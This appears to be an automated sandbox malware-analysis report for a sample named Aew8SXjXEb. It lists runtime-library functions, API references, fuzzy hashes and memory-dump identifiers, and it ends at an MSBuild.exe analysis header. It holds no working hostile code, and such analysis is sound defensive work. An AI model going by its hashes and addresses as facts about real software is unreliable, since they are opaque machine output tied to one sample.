Opcode Fuzzy Hash: b316afacb64bcff1ca339fdd37669927ea77426a22303129ef143ce0898ae8b0
Instruction Fuzzy Hash: A401DF72504934ABCB25EB64F9059AD77AADF913A0B20055DF806AB290DF309E41CF88

Function 00623DB1 Relevance: 7.5, APIs: 5, Instructions: 48COMMON

Download Yara Rule

APIs

std::_Lockit::_Lockit.LIBCPMT ref: 00623DBD
int.LIBCPMT ref: 00623DD0

Part of subcall function 006216B4: std::_Lockit::_Lockit.LIBCPMT ref: 006216C5
Part of subcall function 006216B4: std::_Lockit::~_Lockit.LIBCPMT ref: 006216DF

std::_Facet_Register.LIBCPMT ref: 00623E03
std::_Lockit::~_Lockit.LIBCPMT ref: 00623E19
Concurrency::cancel_current_task.LIBCPMT ref: 00623E24

Memory Dump Source

Source File: 00000000.00000002.1544181606.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true

Associated: 00000000.00000002.1544163593.0000000000620000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1544204622.0000000000643000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1544221013.000000000064D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1544255654.000000000069A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1544268791.000000000069B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1544284153.000000000069C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_620000_Aew8SXjXEb.jbxd

Yara matches

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_Register
String ID:
API String ID: 2081738530-0
Opcode ID: 64624d9b35e1890607da822ac13fe0a8c0d0eb46ec42ca7fc41729cb75cafd62
Instruction ID: 085d6670201f474bf6067440a959b631711b7c7fe76f7de5517e5dc0d562466d
Opcode Fuzzy Hash: 64624d9b35e1890607da822ac13fe0a8c0d0eb46ec42ca7fc41729cb75cafd62
Instruction Fuzzy Hash: C401D472504938ABCB25AB54FD0589D776BDF90760B21154DF8016B391DF349E01CF84

Function 00624308 Relevance: 7.5, APIs: 5, Instructions: 47COMMON

Download Yara Rule

APIs

std::_Lockit::_Lockit.LIBCPMT ref: 00624315
int.LIBCPMT ref: 00624328

Part of subcall function 006216B4: std::_Lockit::_Lockit.LIBCPMT ref: 006216C5
Part of subcall function 006216B4: std::_Lockit::~_Lockit.LIBCPMT ref: 006216DF

std::_Facet_Register.LIBCPMT ref: 0062435B
std::_Lockit::~_Lockit.LIBCPMT ref: 00624371
Concurrency::cancel_current_task.LIBCPMT ref: 0062437C

Memory Dump Source

Source File: 00000000.00000002.1544181606.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true

Associated: 00000000.00000002.1544163593.0000000000620000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1544204622.0000000000643000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1544221013.000000000064D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1544255654.000000000069A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1544268791.000000000069B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1544284153.000000000069C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_620000_Aew8SXjXEb.jbxd

Yara matches

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_Register
String ID:
API String ID: 2081738530-0
Opcode ID: bd20859479942bca4673edfd67f573d68e22bc1ff9383c20d97e17691c7539e7
Instruction ID: 2b17681cea677b3b234afa1885b25bd6eac7fbe9fcf9dad94260996d4910502d
Opcode Fuzzy Hash: bd20859479942bca4673edfd67f573d68e22bc1ff9383c20d97e17691c7539e7
Instruction Fuzzy Hash: B901A232904D38ABCB25EF64B9058DD7BAB9F95760B20055DF805AB291DF309E05CFC8

Function 0066961A Relevance: 7.5, APIs: 5, Instructions: 34COMMONLIBRARYCODE

Download Yara Rule

APIs

__getptd.LIBCMT ref: 00669626

Part of subcall function 00668E77: __getptd_noexit.LIBCMT ref: 00668E7A
Part of subcall function 00668E77: __amsg_exit.LIBCMT ref: 00668E87

__getptd.LIBCMT ref: 0066963D
__amsg_exit.LIBCMT ref: 0066964B
__lock.LIBCMT ref: 0066965B
__updatetlocinfoEx_nolock.LIBCMT ref: 0066966F

Memory Dump Source

Source File: 00000000.00000002.1544221013.000000000064D000.00000004.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true

Associated: 00000000.00000002.1544163593.0000000000620000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1544181606.0000000000621000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1544204622.0000000000643000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1544255654.000000000069A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1544268791.000000000069B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1544284153.000000000069C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_620000_Aew8SXjXEb.jbxd

Yara matches

Similarity

API ID: __amsg_exit__getptd$Ex_nolock__getptd_noexit__lock__updatetlocinfo
String ID:
API String ID: 938513278-0
Opcode ID: 9141d4d236c8230aa4afe5b4a9d8ccb2514574f5d49c72fbeb20a3e596f06de6
Instruction ID: 1456a1021a39afc97dc26de24f048d6bfff1cc7e4dc284f062f8955b02868b8d
Opcode Fuzzy Hash: 9141d4d236c8230aa4afe5b4a9d8ccb2514574f5d49c72fbeb20a3e596f06de6
Instruction Fuzzy Hash: 9FF09032A447109AEBA1BB789802B5D33A6AF00728F55424EF814E72D3CF355941DBAE

Function 0062A060 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 120COMMON

Download Yara Rule

APIs

___except_validate_context_record.LIBVCRUNTIME ref: 0062A09F
__IsNonwritableInCurrentImage.LIBCMT ref: 0062A153

Strings

csm, xrefs: 0062A13D
R[b, xrefs: 0062A16C

Memory Dump Source

Source File: 00000000.00000002.1544181606.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true

Associated: 00000000.00000002.1544163593.0000000000620000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1544204622.0000000000643000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1544221013.000000000064D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1544255654.000000000069A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1544268791.000000000069B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1544284153.000000000069C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_620000_Aew8SXjXEb.jbxd

Yara matches

Similarity

API ID: CurrentImageNonwritable___except_validate_context_record
String ID: R[b$csm
API String ID: 3480331319-2319284495
Opcode ID: 9179637c9d530a82bf4e41dd74be5632d23b13ada113f4b044d0e3e01fa91593
Instruction ID: 79916b4b9528d66ff74a9b9da716344d5fff59c1e81d9ec53650cdf6208601f6
Opcode Fuzzy Hash: 9179637c9d530a82bf4e41dd74be5632d23b13ada113f4b044d0e3e01fa91593
Instruction Fuzzy Hash: 6C41B534A00628DBCF10DFA8D885AEE7BB7EF45324F148159E8145B392C771DA55CF91

Function 0062B3A2 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 27libraryCOMMONLIBRARYCODE

Download Yara Rule

APIs

LoadLibraryExW.KERNEL32(00000000,00000000,00000800,?,0062B353,00000000,?,0069B6DC,?,?,?,0062B4F6,00000004,InitializeCriticalSectionEx,00644BD8,InitializeCriticalSectionEx), ref: 0062B3AF
GetLastError.KERNEL32(?,0062B353,00000000,?,0069B6DC,?,?,?,0062B4F6,00000004,InitializeCriticalSectionEx,00644BD8,InitializeCriticalSectionEx,00000000,?,0062B2AD), ref: 0062B3B9
LoadLibraryExW.KERNEL32(00000000,00000000,00000000), ref: 0062B3E1

Strings

api-ms-, xrefs: 0062B3C6

Memory Dump Source

Source File: 00000000.00000002.1544181606.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true

Associated: 00000000.00000002.1544163593.0000000000620000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1544204622.0000000000643000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1544221013.000000000064D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1544255654.000000000069A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1544268791.000000000069B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1544284153.000000000069C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_620000_Aew8SXjXEb.jbxd

Yara matches

Similarity

API ID: LibraryLoad$ErrorLast
String ID: api-ms-
API String ID: 3177248105-2084034818
Opcode ID: 193819baa534455c1bc08de7408e43bbf3ff028e09cb97791059b4586db4ff77
Instruction ID: fd97746e6c108c1b51d51a21a3b0db221612bf7e3cae2f654e4590c1a5ec4f85
Opcode Fuzzy Hash: 193819baa534455c1bc08de7408e43bbf3ff028e09cb97791059b4586db4ff77
Instruction Fuzzy Hash: 29E01A34684214B7EB216FB1EC4AB9D3B5AEF01B41F201121FA0CE82E1EB619A508A84

Function 00637747 Relevance: 6.3, APIs: 4, Instructions: 338fileCOMMONLIBRARYCODE

Download Yara Rule

APIs

GetConsoleOutputCP.KERNEL32(0C77E109,00000000,00000000,00000000), ref: 006377AA

Part of subcall function 0063952A: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,?,0000FDE9,00000000,-00000008,00000000,?,00638FD3,?,00000000,-00000008), ref: 006395D6

WriteFile.KERNEL32(?,?,00000000,?,00000000), ref: 00637A05
WriteFile.KERNEL32(?,?,00000001,?,00000000), ref: 00637A4D
GetLastError.KERNEL32 ref: 00637AF0

Memory Dump Source

Source File: 00000000.00000002.1544181606.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true

Associated: 00000000.00000002.1544163593.0000000000620000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1544204622.0000000000643000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1544221013.000000000064D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1544255654.000000000069A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1544268791.000000000069B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1544284153.000000000069C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_620000_Aew8SXjXEb.jbxd

Yara matches

Similarity

API ID: FileWrite$ByteCharConsoleErrorLastMultiOutputWide
String ID:
API String ID: 2112829910-0
Opcode ID: 49e59cfc7667867b050d8137822fbdeed779daacddab0641821f4d13fbbc695e
Instruction ID: 8ee5b8962023e1079cc6b0e84955820d834ac10b17bf21729c96f9074aa63e1f
Opcode Fuzzy Hash: 49e59cfc7667867b050d8137822fbdeed779daacddab0641821f4d13fbbc695e
Instruction Fuzzy Hash: 10D159B5E042599FCB15CFA8D880AEDBBB6FF49310F18416AE865E7351D730A942CB90

Function 006406EF Relevance: 6.0, APIs: 4, Instructions: 29COMMONLIBRARYCODE

Download Yara Rule

APIs

WriteConsoleW.KERNEL32(00000000,0000000C,?,00000000,00000000,?,0063F713,00000000,00000001,00000000,00000000,?,00637B44,00000000,00000000,00000000), ref: 00640706
GetLastError.KERNEL32(?,0063F713,00000000,00000001,00000000,00000000,?,00637B44,00000000,00000000,00000000,00000000,00000000,?,006380CB,00000000), ref: 00640712

Part of subcall function 006406D8: CloseHandle.KERNEL32(FFFFFFFE,00640722,?,0063F713,00000000,00000001,00000000,00000000,?,00637B44,00000000,00000000,00000000,00000000,00000000), ref: 006406E8

___initconout.LIBCMT ref: 00640722

Part of subcall function 0064069A: CreateFileW.KERNEL32(CONOUT$,40000000,00000003,00000000,00000003,00000000,00000000,006406C9,0063F700,00000000,?,00637B44,00000000,00000000,00000000,00000000), ref: 006406AD

WriteConsoleW.KERNEL32(00000000,0000000C,?,00000000,?,0063F713,00000000,00000001,00000000,00000000,?,00637B44,00000000,00000000,00000000,00000000), ref: 00640737

Memory Dump Source

Source File: 00000000.00000002.1544181606.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true

Associated: 00000000.00000002.1544163593.0000000000620000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1544204622.0000000000643000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1544221013.000000000064D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1544255654.000000000069A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1544268791.000000000069B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1544284153.000000000069C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_620000_Aew8SXjXEb.jbxd

Yara matches

Similarity

API ID: ConsoleWrite$CloseCreateErrorFileHandleLast___initconout
String ID:
API String ID: 2744216297-0
Opcode ID: db02daa1af0310a8c415b70e32b3e03c5eae3f98193de73222246509c6a1b906
Instruction ID: f8761cc06e45dd06509ab40cb0ce42121285f13146786dc836abfbf0fce6fca4
Opcode Fuzzy Hash: db02daa1af0310a8c415b70e32b3e03c5eae3f98193de73222246509c6a1b906
Instruction Fuzzy Hash: 4DF01C3A500168BBDF622F95DC089C93FA7FB4A3A1B115010FB1A96620CA328920EF95

Function 00641093 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 147COMMONLIBRARYCODE

Download Yara Rule

APIs

DecodePointer.KERNEL32(?,?,?,?,?,?,?,?,?,006409EF), ref: 006410AC

Strings

Lid, xrefs: 00641241
R[b, xrefs: 00641176, 00641220, 00641266

Memory Dump Source

Source File: 00000000.00000002.1544181606.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true

Associated: 00000000.00000002.1544163593.0000000000620000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1544204622.0000000000643000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1544221013.000000000064D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1544255654.000000000069A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1544268791.000000000069B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1544284153.000000000069C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_620000_Aew8SXjXEb.jbxd

Yara matches

Similarity

API ID: DecodePointer
String ID: Lid$R[b
API String ID: 3527080286-3876915504
Opcode ID: a0861a290d2d7e102913b937cdbfbe9fd73435a3fbef79d69def13d1b5717d84
Instruction ID: 8cc985b452c6c74d092199c3d5cd120dfa1a74abfa46fce1e721dd28ca6d381d
Opcode Fuzzy Hash: a0861a290d2d7e102913b937cdbfbe9fd73435a3fbef79d69def13d1b5717d84
Instruction Fuzzy Hash: 54517C7190060ADBCF109FA9E9481FEBFB7FB0B304F104145E591EB354CBB48AAA8B55

Function 00625F4D Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 116COMMON

Download Yara Rule

APIs

_Fputc.LIBCPMT ref: 00626026

Strings

R[b, xrefs: 00626005

Memory Dump Source

Source File: 00000000.00000002.1544181606.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true

Associated: 00000000.00000002.1544163593.0000000000620000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1544204622.0000000000643000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1544221013.000000000064D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1544255654.000000000069A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1544268791.000000000069B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1544284153.000000000069C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_620000_Aew8SXjXEb.jbxd

Yara matches

Similarity

API ID: Fputc
String ID: R[b
API String ID: 3078413507-1787471655
Opcode ID: 329ad0904338c5267d3225898346fd964a8fa425f9a414cdd5175d85b7a7946c
Instruction ID: ca19a74840a8514acc44290936b18a28186f7fc3f3130e1c0fcdfe4efca0e5b7
Opcode Fuzzy Hash: 329ad0904338c5267d3225898346fd964a8fa425f9a414cdd5175d85b7a7946c
Instruction Fuzzy Hash: C1416136911A2AABCF24DF64E5409EDB7BAFF09311B14406AE542A7780E731FD51CF90

Function 0062A96D Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 112COMMONLIBRARYCODE

Download Yara Rule

APIs

EncodePointer.KERNEL32(00000000,?), ref: 0062A992

Strings

RCC, xrefs: 0062A9AC
MOC, xrefs: 0062A9A4

Memory Dump Source

Source File: 00000000.00000002.1544181606.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true

Associated: 00000000.00000002.1544163593.0000000000620000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1544204622.0000000000643000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1544221013.000000000064D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1544255654.000000000069A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1544268791.000000000069B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1544284153.000000000069C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_620000_Aew8SXjXEb.jbxd

Yara matches

Similarity

API ID: EncodePointer
String ID: MOC$RCC
API String ID: 2118026453-2084237596
Opcode ID: 8162a3f4d12c6162d9d8d61c1ec5ef7655382b5d0840f6fe4def7798d75f8dae
Instruction ID: f50df7d43c469ee585bae6ddcf80c817cd1c4fd9af42456406b788536f1af05d
Opcode Fuzzy Hash: 8162a3f4d12c6162d9d8d61c1ec5ef7655382b5d0840f6fe4def7798d75f8dae
Instruction Fuzzy Hash: 21414A71900619EFCF16DF98DE81AEEBBB6BF48300F198099F904A7211D3769990DF52

Function 00664FD8 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 67COMMON

Download Yara Rule

APIs

__aulldiv.LIBCMT ref: 0066504A
__aulldiv.LIBCMT ref: 00665058

Strings

@, xrefs: 00665025

Memory Dump Source

Source File: 00000000.00000002.1544221013.000000000064D000.00000004.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true

Associated: 00000000.00000002.1544163593.0000000000620000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1544181606.0000000000621000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1544204622.0000000000643000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1544255654.000000000069A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1544268791.000000000069B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1544284153.000000000069C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_620000_Aew8SXjXEb.jbxd

Yara matches

Similarity

API ID: __aulldiv
String ID: @
API String ID: 3732870572-2766056989
Opcode ID: 7e71b2cf3ab39a96845f2c5ec6281b05558ac3270fef8c112806fab1e15290c3
Instruction ID: 7db6bdf5f79d77744cd52a4e28977eb4a51b7c59653076a0203540cd1f33e344
Opcode Fuzzy Hash: 7e71b2cf3ab39a96845f2c5ec6281b05558ac3270fef8c112806fab1e15290c3
Instruction Fuzzy Hash: 31211DB1E44218ABDB10DFD4CC4AFAEB7B9FB45B10F104519F605BB280D779A9018BA5

Function 00625107 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 49COMMONLIBRARYCODE

Download Yara Rule

APIs

std::_Lockit::_Lockit.LIBCPMT ref: 00625113
std::_Lockit::~_Lockit.LIBCPMT ref: 0062516F

Strings

R[b, xrefs: 0062513A, 00625154

Memory Dump Source

Source File: 00000000.00000002.1544181606.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true

Associated: 00000000.00000002.1544163593.0000000000620000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1544204622.0000000000643000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1544221013.000000000064D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1544255654.000000000069A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1544268791.000000000069B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1544284153.000000000069C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_620000_Aew8SXjXEb.jbxd

Yara matches

Similarity

API ID: Lockitstd::_$Lockit::_Lockit::~_
String ID: R[b
API String ID: 593203224-1787471655
Opcode ID: 48bd41268b4f88e31f586e291f7828a5b4948653bfad71313ce59f61a5f3ec53
Instruction ID: 0bd3feae0f7d3c06c35223bcbe817db33c4541200a648eb7e43c40b8884c0a51
Opcode Fuzzy Hash: 48bd41268b4f88e31f586e291f7828a5b4948653bfad71313ce59f61a5f3ec53
Instruction Fuzzy Hash: A9017135600A25EFCB15EF14E889E9D77BAEF86754B140099E806AB3A1DF70EE40CF50

Function 0064E0F8 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 41COMMON

Download Yara Rule

APIs

__aulldiv.LIBCMT ref: 0064E130
__aulldiv.LIBCMT ref: 0064E13E

Strings

@, xrefs: 0064E10B

Memory Dump Source

Source File: 00000000.00000002.1544221013.000000000064D000.00000004.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true

Associated: 00000000.00000002.1544163593.0000000000620000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1544181606.0000000000621000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1544204622.0000000000643000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1544255654.000000000069A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1544268791.000000000069B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1544284153.000000000069C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_620000_Aew8SXjXEb.jbxd

Yara matches

Similarity

API ID: __aulldiv
String ID: @
API String ID: 3732870572-2766056989
Opcode ID: e3d9931386e0fa91028f4e7641da7fda79c4023127bcc5196728e9d9e144d5c4
Instruction ID: d77018703e3caf0bacdbfb7f8305609d4bb4cd5e5eb413a7e30c836505e34d41
Opcode Fuzzy Hash: e3d9931386e0fa91028f4e7641da7fda79c4023127bcc5196728e9d9e144d5c4
Instruction Fuzzy Hash: 8801FBB0980308FAEB10EBE0CC4AB9DBA7AFB04705F208459E60477280D6B559468B5A

Function 006215DF Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 33COMMON

Download Yara Rule

APIs

std::_Lockit::_Lockit.LIBCPMT ref: 006215E6
std::_Locinfo::_Locinfo_ctor.LIBCPMT ref: 0062161E

Part of subcall function 00625178: _Yarn.LIBCPMT ref: 00625197
Part of subcall function 00625178: _Yarn.LIBCPMT ref: 006251BB

Strings

bad locale name, xrefs: 0062162C

Memory Dump Source

Source File: 00000000.00000002.1544181606.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true

Associated: 00000000.00000002.1544163593.0000000000620000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1544204622.0000000000643000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1544221013.000000000064D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1544255654.000000000069A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1544268791.000000000069B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1544284153.000000000069C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_620000_Aew8SXjXEb.jbxd

Yara matches

Similarity

API ID: Yarnstd::_$Locinfo::_Locinfo_ctorLockitLockit::_
String ID: bad locale name
API String ID: 1908188788-1405518554
Opcode ID: c8b79faf937cc57646a26f4ee7b3611a14062fc20cf6e119012c97a07f4a5fa8
Instruction ID: 1d538cbff362b94efda32e2608c659ef443eddccddeb80dd0d3942933c5e3db3
Opcode Fuzzy Hash: c8b79faf937cc57646a26f4ee7b3611a14062fc20cf6e119012c97a07f4a5fa8
Instruction Fuzzy Hash: AFF01D71545F909E83319F7A9481457FBE5BE293203948E2EE0DEC3A11D730A404CF6A

Function 006362A6 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 26COMMON

Download Yara Rule

APIs

InitializeCriticalSectionAndSpinCount.KERNEL32(?,?), ref: 006362E6

Strings

R[b, xrefs: 006362D6
InitializeCriticalSectionEx, xrefs: 006362B6

Memory Dump Source

Source File: 00000000.00000002.1544181606.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true

Associated: 00000000.00000002.1544163593.0000000000620000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1544204622.0000000000643000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1544221013.000000000064D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1544255654.000000000069A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1544268791.000000000069B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1544284153.000000000069C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_620000_Aew8SXjXEb.jbxd

Yara matches

Similarity

API ID: CountCriticalInitializeSectionSpin
String ID: InitializeCriticalSectionEx$R[b
API String ID: 2593887523-1225643945
Opcode ID: 283173001c4266b19102ff256dc0f1aca3ea3b44169fb181fb1782ddefd4bc4d
Instruction ID: a2b6634bdb1d713d34ea4f6ee3e2900f358c072f346b80c4075d94bc2b57ec6b
Opcode Fuzzy Hash: 283173001c4266b19102ff256dc0f1aca3ea3b44169fb181fb1782ddefd4bc4d
Instruction Fuzzy Hash: 4AE0123A544228B7CF112FA1EC06EDE7F17DB46BA1F018021FD1825260CBB2DA6196D5

Function 0063612C Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 22memoryCOMMON

Download Yara Rule

APIs

TlsAlloc.KERNEL32 ref: 00636160

Strings

R[b, xrefs: 00636156
FlsAlloc, xrefs: 0063613C

Memory Dump Source

Source File: 00000000.00000002.1544181606.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true

Associated: 00000000.00000002.1544163593.0000000000620000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1544204622.0000000000643000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1544221013.000000000064D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1544255654.000000000069A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1544268791.000000000069B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1544284153.000000000069C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_620000_Aew8SXjXEb.jbxd

Yara matches

Similarity

API ID: Alloc
String ID: FlsAlloc$R[b
API String ID: 2773662609-2083232884
Opcode ID: b2aeffc70b55e3e75d92a213fd93da51e4a7adff92d35f538e9ce53a4a33961f
Instruction ID: 8fe0304037f9c67320adecb6c15e2b37246b92efa466c2ad7ff7440a271976a4
Opcode Fuzzy Hash: b2aeffc70b55e3e75d92a213fd93da51e4a7adff92d35f538e9ce53a4a33961f
Instruction Fuzzy Hash: B8E0C23A685228B3832127A4ED07E9E7A17CB55F61F018020FE0426381CBA6991092D5

Analysis Process: MSBuild.exePID: 2332, Parent PID: 6032COMMON

Execution Graph

Execution Coverage:	13.4%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	0.6%
Total number of Nodes:	1529
Total number of Limit Nodes:	3

Executed Functions

Function 004045C0 Relevance: 112.1, APIs: 34, Strings: 30, Instructions: 114
stringmemoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

